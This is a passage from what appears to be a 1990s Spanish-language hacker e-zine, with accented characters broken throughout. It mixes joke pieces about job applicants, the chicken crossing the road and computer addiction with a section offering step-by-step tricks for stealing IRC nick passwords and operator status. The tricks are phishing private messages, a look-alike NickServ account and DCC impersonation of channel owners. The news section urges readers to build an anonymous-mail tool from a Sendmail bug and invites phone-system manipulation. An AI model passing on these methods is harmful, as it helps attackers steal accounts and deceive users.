curriculum esta impreso en papel reciclado.

4.- ECHON
La extensi�n de mi curriculum era tal, que he decidido
envi�rselo en CDROM. Puede usted llamarme al m�vil (celular)
o dejar el mensaje a mi secretaria.

5.- CIBERPLASTA
Si visita mi p�gina web podr� ver mi direcci�n de correo y
mi n�mero de abonado del beeper. Tambi�n me conecto al canal
irc #curriculum de 8 a 10, y he creado un foro de discusi�n,
desde el que podr� acceder a un viaje virtual en el que
conocer� a mi novia, a mi perro y varios trucos de hacker.

6.- ARTHUR ANDERSEN
Soy master MBA, NBA y del Universo. Me ha bastado un vistazo
a su empresa para darme cuenta de que tiene problemas. Yo
podr�a ayudarle por una m�dica cantidad. Pero como usted no
tiene ni idea le cobrar� el doble.

7.- INGL�S AVANZADO
Ai want tu incorporate tu llor enterprais, ai am fri of
servicio militar and guant to cobrar money, if want, phone
me to speak about mai experiense working in Almusafes's
citti. Have a nice kiss.

8.- INFORMATICA AVANZADA
En el verano realic� un curso de 3 horas y cuarto de
duraci�n sobre windows 3.11 avanzado. Asimismo se programar
en Word y dibujar con el scandisk, as� como modelado
avanzado con Excel. Pero en lo que realmente soy experto es
en el retoque fotogr�fico, empleo indistintamente el Winzip
y el Java. Tengo un primo en M�rida que tiene Internet.

�A cu�l de ellos contratamos?

Colaboraci�n de: Santi Sanchez

�POR QUE EL POLLO CRUZ� LA CARRETERA? ************************

RESPUESTAS:

-PROFESOR DE PRIMARIA: Porque quer�a llegar al otro lado.
-PLATON: Porque buscaba el bien.
-ARISTOTELES: Esta en la naturaleza de los pollos cruzar la
carretera.
-MARX: Era una inevitabilidad hist�rica.
-MOISES: Y Dios bajo de los cielos y le dijo al pollo: Cruza
la carretera. Y el pollo cruz� la carretera y todos se
regocijaron.
-SADAM HUSSEIN: Fue un acto de rebeli�n no provocado y el
que lanz�semos 50 toneladas de gas nervioso estuvo
plenamente justificado.
-RONALD REAGAN: Se me olvid�.
-CAPITAN KIRK: Para ir donde ning�n pollo ha llegado jamas.
-HIPOCRATES: Debido a un exceso de humores en su p�ncreas.
-ANDERSEN CONSULTING: La desregulaci�n del lado de la
carretera del pollo amenazaba su posici�n dominante en el
mercado. El pollo se enfrentaba a importantes retos para
crear y desarrollar las competencias necesarias para encarar
la competitividad del mercado. Andersen Consulting, en una
relaci�n de socio con el cliente, ayud� al pollo redise�ando
su estrategia de distribuci�n f�sica y procesos de
implantaci�n. Empleando el m�todo de integraci�n av�cola
(MIA), Andersen ayudo al pollo a emplear sus habilidades,
metodolog�a, conocimiento, capital y experiencias para
alinear a la gente, procesos y tecnolog�a del pollo en el
apoyo de su estrategia global dentro de un marco de trabajo
de Gesti�n de Programas. Andersen Consulting convoc� un
equipo multidisciplinario de analistas de carreteras y
mejores pollos que, junto con consultores de Andersen con
profundas habilidades en la industria del transporte,
abordaron durante dos d�as una serie de reuniones al objeto
de apalancar su capital personal de conocimiento, tanto
expl�cito como impl�cito, y de permitirles obtener sinergias
entre si para conseguir las metas impl�citas de la entrega y
dise�o exitoso e implementando un marco de valores de
empresa a trav�s del continuo de procesos av�colas. Las
reuniones se mantuvieron en un entorno que reproduc�a un
parque, posibilitando y creando un entorno de alto impacto
que estaba estrat�gicamente situado, centrado en la
industria y elaborando un mensaje consistente, claro y �nico
frente al mercado, alineado con la misi�n, visi�n y valores
principales del pollo. Esto condujo a la creaci�n de una
soluci�n integradora de negocio total. Andersen Consulting
ayud� a que el cambio del pollo fuese mas exitoso. El pollo
consigui� la certificaci�n de AENOR de cumplir la norma ISO
9000. (Realmente, el pollo muri� atropellado por tardar
tanto en cruzar).
-MARTIN LUTERO KING: Veo un mundo en el que todos los pollos
ser�n libres de cruzar la carretera sin que sus motivos se
cuestionen.
-BILL CLINTON: El pollo no cruz� la carretera. Repito, el
POLLO no cruz� la carretera.
-MAQUIAVELO: La cuesti�n es que el pollo cruz� la carretera.
�A qui�n le importa por que? El fin de cruzar la carretera
justifica cualquier motivo.
-FREUD: El hecho de que est�s preocupado porque el pollo
cruce o no la carretera revela tu inseguridad sexual.
-BILL GATES: Acabo de lanzar el Pollo Office 2000, que no
solo cruza carreteras, sino que pone huevos, archiva tus
documentos importantes y cuadra tus cuentas.
-DARWIN: A lo largo de grandes periodos de tiempo, los
pollos han sido seleccionados naturalmente de modo que ahora
tienen una disposici�n gen�tica a cruzar carreteras.
-EINSTEIN: El si el pollo ha cruzado la carretera o la
carretera se ha movido debajo del pollo depende de tu marco
de referencia.
-BUDA: Preguntar eso niega tu propia naturaleza de pollo.
-HEMINGWAY: Para morir. Bajo la lluvia.

Colaboraci�n de: Carlos Rodr�guez
Desde Buenos Aires, Argentina

************************
* *
*7.-ES UD. UNA PERSONA *
* VERSION 2.0 *
* *
************************

___________________________________________________________ Guillermo S.

En este mundo de locos, en el que por primera vez se
vendieron m�s computadores que televisores, en el que
arrancar a los hijos del computador es m�s dif�cil que
obligarlos a tomarse una sopa de arvejas, es importante
saber si la fiebre inform�tica le ha alterado a uno el
comportamiento normal.

Por esto he decidido adaptar un test que circula por
Internet con el cual usted puede deducir si est� pasando
mucho tiempo con el computador.

1. �Cuando va al ba�o, dice sonriendo que va a hacer un
download?

2. �Ha pensado alguna vez que puede abrir la puerta de su
casa con solo dar doble click sobre ella?

3. �Cuando llama a alguien, en vez de decir: '�Al�?', dice
'pppiiiiiiiiiii', que es el sonido de un m�dem?

4. �Se refiere a su novia (o) o esposa (o) como su
perif�rico plug and play?

5. �Su ropa interior lleva el logotipo de Intel Inside?

6. �Cada vez que sostiene una discusi�n acalorada o se
encuentra en problemas, trata de 'reinicializar' o dar
reboot a la situaci�n?

7. �Cuando el m�dico le dice que esa gripe que tiene es por
un virus que anda circulando, lo primero que piensa es en
cu�l ser� el mejor programa antivirus para hacerle frente?

8. �Sus amigos, haci�ndole un chiste, le cuentan a todo el
mundo que su nombre es... 'Bon', 'Web-bon'?

9. �Sin darse cuenta, anota los valores de sus cheques en
binario?

10. �Cuando est� buscando la frase apropiada para proponerle
matrimonio a la novia, solo se le ocurre decirle que si
quiere hacer upgrade de novia 9.5 a esposa 1.0?

11. �Cuando le dicen que usted es una persona acelerada, se
disculpa diciendo que lo que pasa es que sufre de
multiprocesamiento masivo en paralelo?

12. �Cree usted que 500 AC significa 500 a�os antes de
computadores?

13. �Cuando le solicitan su tel�fono, ha suministrado en su
lugar su direcci�n IP?

14. �Est� usted pensando en crear un sitio en Internet para
su mascota preferida?

15. �Tiene usted hijos que se llaman Yahoo, Eudora o
Altavista?

No se debe calificar ninguna de las respuestas 'S�' o 'No' a
las preguntas de este cuestionario. Con que solo haya
contestado 'S�' a una de ellas, es muestra de que usted est�
en problemas!

Autor Guillermo S.

***********************************
* *
*8.- Como robar nick e incluso *
* ops en IRC *
* *
***********************************

__________________________________________________________ Varios

Hola chikos aki vamos a mostrar una forma f�cil y simple de robar nicks
y las pass respectivas .
Este texto se lo dedico al IMBECIL que trato de enga�arme en el canal
#chile de dalnet , que por muy IMBECIL que seas .. tengo que admirar
tu ingenio ..., bueno ak� esta el resultado de tus labores :-) .

Bueno este es el cuento , normalmente en algunos servidores como Dalnet
por poner un Ejemplo piden una identificaci�n o password para los nick ,
lo que evita el que otros ocupen tu nick , e identifica a los operadores
de los canales . El metodo de identificacion es algo parecido a esto :

Seguiremos poniendo a Dalnet como ejemplo ..

/msg nickserv registry pass --->con esto registramos el nick que
tenemos con un password.

/msg nickserv identify pass --->es lo que ponemos cada vez que
ingresamos a dalnet , para que
no utilizen nuestro nick .

asi tambien hay otros servicios que utilizan comandos parecidos.

Es de este tipo de servicios que nos aprovecharemos , es muy simple
y basico .
Crearemos dos usuarios uno llamado "Mensaje" y el otro que sera un clon
u otro colega (perevia sincronizaci�n)sera el "nicklist", recomendable
el segundo metodo para evitar que nos pillen o para no levantar sospechas.

Entonces el usuario mensaje manda query a todos los usuarios del canal
#vicitmas con el siguiente mensaje :

si quieres ingresar a la lista de nicks de dalnet , escribe
/msg nicklist nick clavedenick , asi lo protegeras de posibles robos.

Jajajaja .. de esta manera no faltaran los ilusos que escribiran el /msg
etc.. etc... con lo cual entregaran el nick y la clave del nick al usuario
nicklist recopilando asi una gran cantidad de informaci�n y no faltara
alg�n op que caera f�cil ;y si tienes suerte te calzas algun sop e incluso
el founder , te das op y listo .....

Otros metodos de recibir claves y pass en forma facil ser�a ponerte un
nombre parecido al usuario de registro por ejemplo :

En dalnet es el nickserv encargado de registrar e identificar los nicks,
ser�a inteligente registrar algun nick parecido a este como nickser etc..
de tal forma que no faltara la oportunidad en que alguien se equivoque en
poner :

/msg nickserv identify pass correcto
/msg nickser identify pass si se equivocan

Asi recolectar�as gran cantidad de claves de nicks en caso de alguna
emergencia :-) .----

Otra forma entretenida de darte op ser�a a travez del DCC , la forma es
la siguiente ..

Estas en el canal #victimas que es al cual siempre te conectas y ya estas
aburrido de no ser op etc .. ya sabes quienes son sop y ops y founder etc..
entonces lo que haces es abrir otra sesi�n del script pero no la conectas
al server . Es decir tenemos ya una ventana conectada al server capullo
y estamos en el cana #victimas . Tenemos otro scritp activo pero desconectado
de cualquier servidor .
Entonces en el script que tienes desconectado del server te pones el nick de
uno de los SOP , entonces abres un dcc chat y en el cuadro donde normalmente
pones el nick , le pones la direcci�n Ip del SOP victima , esperas a que acepte
el dcc y le dices algo como : Oye sabes que este chico (tu por supuesto ) me ha
ca�do bien y creo que se merece un OP , se lo puedes dar ya que estoy super
ocupado ya que tengo un query con una chika que me quiere puro dar .
Si tienes suerte el SOP victima te dara op y listo , pero ojala no verifique la
ip si es asi te freiste .

ESte truco funciona gracias a que el DCC no pasa por el servidor , si no que es
una comunicaci�n directa entre dos usuarios , es por eso que no existe collision
de nicks entre tu y el SOP que estas suplantando ..

Bueno las utilidades que aki muestro son muchas , hecha a volar tu imaginaci�n
y cuentanos si haces algo entretenido .

Estamos abiertos a caulquier sugerencia .
************************************************************************

*******************************
# #
# 9.- Noticias al Cierre #
# #
///////////////////////////////

RAREGAZZ :- El Dia lunes 08 de Junio , pudimos visualizar el nuevo entorno de RAREGAZZ ,
el dise�o de su nueva WEB es Excelente .. ademas cambiaron la direcci�n de su lista de
correo , as� que si ya estabas inscrito te recomiendo que lo hagas de nuevo .RARETRIP
desaparece de la ecena durante alg�n tiempo pero GuyBrush , Azumlord y Cytorax , est�n
haciendo un gran esfuerzo para mantener El E-zine , Animo chikos ...

Fer el salteador del Web :- Por razones mas que conocidas (BSA , guardia civil , etc..)
fer el famosisimo creador de VIVA EL JAMON Y LE VINO .- ha cerrado su sitio WEB ,
http://www.salteador.com al prncipio estaba regalando su dominio pero despues de capacitar
decidio darse un tiempo .... FUERZA FER , No te rindas ... desde el culo del mundo te apoyamos
POr FAvor enviar mas detalles ..

SET : Deber�a estar en circulaci�n el numero 15 de SET Saqueadores Edici�n T�cnica , para el
d�a 15 de Junio .. esperemos que se as� para disfrutar de este fantastico magazine ..--

NUevo bug en sendmail 8.8.8 y Exchange :- Hemos sabido de un nuevo bug de Sendmail y exchange ..
el bug consiste ne mandar alrededor de 1kb en el comando hello ... , esto hara que el programa
borre la cabecera del correo , es decir , desaparece nuestra Ip y todos nuestros datos del mail ..
Invitamos a todos los programadores que leen este E-Zine ( ya que no le pego mucho a la programaci�n)
a crear un programa que mande el kilobyte de informaci�n al comando hello y as� poder hacer un verdadero
programa de mail an�nimo ... de hecho podr�a intervenir alg�n programa existente ....si lo logran
cuentenos sus resultados ... y mandenos el programa para ponerlo en nuestra WEB ..

Phreackers : Invitamos a todos los Phreackers CHilenos a colaborar con esta noble causa ..
o a cualquiera que sepa manipular el sistema telef�nico nacional ...

*************************
* *
* 10.- Despedida *
* *
*************************

Bueno va llegando la hora de decir adios , fue un placer haber entregado este
trabajo , talvez no es de excelente calidad pero va a ir mejorando a medida que
ustedes se animen a escribir algunos articulos , la verdad hicimos todo lo
posible . Pero tengo fe en que se nos unan mas colaboradores , yo se que en las
universidades (en especial la U. de Chile ;-)estan llenas de excelentes hackers
y demases , as� que espero que se animen . La idea es compartir conocimientos
y no dejar la informaci�n para algunos pocos , como dicen por ah� la informaci�n
debe ser libre .Espero disculpen todas las faltas de potograf�a.. perd�n de
ortograf�a , deben entender en las circunstancias que escribimos este E-Zine .
Aceptamos cualquier tipo de cr�ticas , simpre que estas sean constructivas .
No nos queremos poner al nivel de grandes E-Zine por que no lo estamos "aun" :-)
Cuando copiemos algun texto o listado , simpre dir� de donde lo sacamos
no vamos a plagiar textos anteriores y si se parece a alguno ser� mera
coincidencia .
No queremos ser como algunos E-Zine que sacan su primer numero y ah� quedan
estancados como si nada , queremos seguir evolucionando , tenemos que seguir
aprendiendo para que nos dejen de llamar subdesarrollados . Ahora comienza lo
dif�cil hacer el numero Dos pero ya tenemos algo no desespere�s el siguiente
numero estar� listo esperamos que en menos de 2 meses con cueva .,.

Agradecimientos a :

RAREGAZZ
SET
JJF/HACKERS TEAM
CYBERHACK
UNDERHACK
MINOTAURO Aunque ya no exista.-
ISLATORTUGA
FER Por ser como eres . Gracias a ti , cuando ten�as viva el jam�n y
el vino , fue que me interese por el hacking .
Ipgh0st Por tus comentarios sobre el Borrador.
Nobody Por esos excelentes textos que escribes .
Koji Por escuchar mis pavadas en IRC .
Cachureos Por entretener a los ni�os .
A mi papa Por no haber usado condon esa noche .
A mi mama Por aguantarme todos estos a�os .
A Plaxiucita Por hacerme ver la vida de otra manera.
A Plaxiulina Por amarme y aguantar mis ataques de computolog�a .
Y a toda la tracalada del Mundo Under de la cual he aprendido muchas cosas .

PlaXiuS El editor (por mientras ;))

��VIVA er chino R�os!!

Ultimos Mensajes del Foro

Manuales recientes

Manual Aleatorio

Webs Amigas

Noticias recientes

Menu de Usuario

Encuestas